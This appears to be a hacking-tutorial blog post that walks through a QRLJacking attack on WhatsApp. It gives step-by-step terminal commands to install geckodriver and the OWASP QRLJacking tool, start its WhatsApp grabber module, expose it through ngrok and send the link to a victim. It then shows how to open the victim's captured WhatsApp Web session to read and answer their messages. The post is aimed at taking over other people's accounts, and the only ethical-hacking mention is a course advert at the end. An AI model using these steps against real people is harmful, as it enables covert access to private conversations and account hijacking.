QRL Jacking | Make Access On Anyone WhatsApp Without Touch | 2022 Working

The most asked question to me from newbies in hacking is "How To Hack Whatsapp Without Touching a Victim's Device", So today I show you how actually hacker/attacker makes access to a victim's account without even touching or asking for any OTP from a victim just using social engineering technique.

Before diving into this information let me clear one thing so it's easy to understand what we are going to do. Whatsapp has end-to-end encryption so it's near to impossible to directly spy or read victim Whatsapp messages, different methods are used in different conditions and situations like MacSpoofing, OTP Phishing, SS7, and some others. 

QRLJacking

In this article, I'll show you a method known as QRLJacking in which the attacker/hacker sends a malicious link to the target device and make them scan their QR code of WhatsApp, so the attacker/hacker is able to catch the WhatsApp web session in which they can read/spy or respond messages.

Requirements

• Linux/macOS (Linux Recommended)
• Firefox Latest Version
• Python 3.7+

I am going to show a Linux tutorial in this article. 

Steps

• First of all, you have to download the driver for firefox and setup in your Linux system using the commands given below:

Download Latest-geckodriver 

tar -xvf <-type-geckodriver-tar-package-name->

chmod +x geckodriver

sudo mv -f geckodriver /usr/local/share/geckodriver

sudo ln -s /usr/local/share/geckodriver /usr/local/bin/geckodriver

sudo ln -s /usr/local/share/geckodriver /usr/bin/geckodriver

• Now download and set up the QRLJacking tool given commands

git clone https://github.com/OWASP/QRLJacking

cd QRLJacking/QRLJacker

pip install -r requirements.txt

python3 QrlJacker.py

Now the QRLJacker interface opens on your Terminal as shown in the image.

Now we are ready to perform vector QR Jacking attack, type given commands:

use grabber/whatsapp

set port 4444

run

I am testing this tool on my localhost (You can do port forwarding for out-of-LAN devices and I recommend using ngrok for it) so my port is 4444 and the host is 0.0.0.0 in this tutorial. So in my case, the QR code link is 0.0.0.0:4444.

Now send that link to the victim and once the victim scanned their WhatsApp web QR code, the hacker/attacker gets a session saved on this tool to later access a WhatsApp Web session.

• Press Ctrl +C to intercept the QRJacker tool and type the commands given below:

sessions

• Now the list of saved sessions is shown on your Terminal (In my case "0")

sessions -i 0

Now wait a few seconds and Firefox automatically launched and you get a WhatsApp web session of the victim as shown in the image given below.

I hope this information is helpful to you and if you still face any problems or errors then feel free to reach me. If you want to learn complete Ethical Hacking from scratch level then try our "Hacking Like Watch Dogs" course and start your journey today. Thanks for reading, until next time.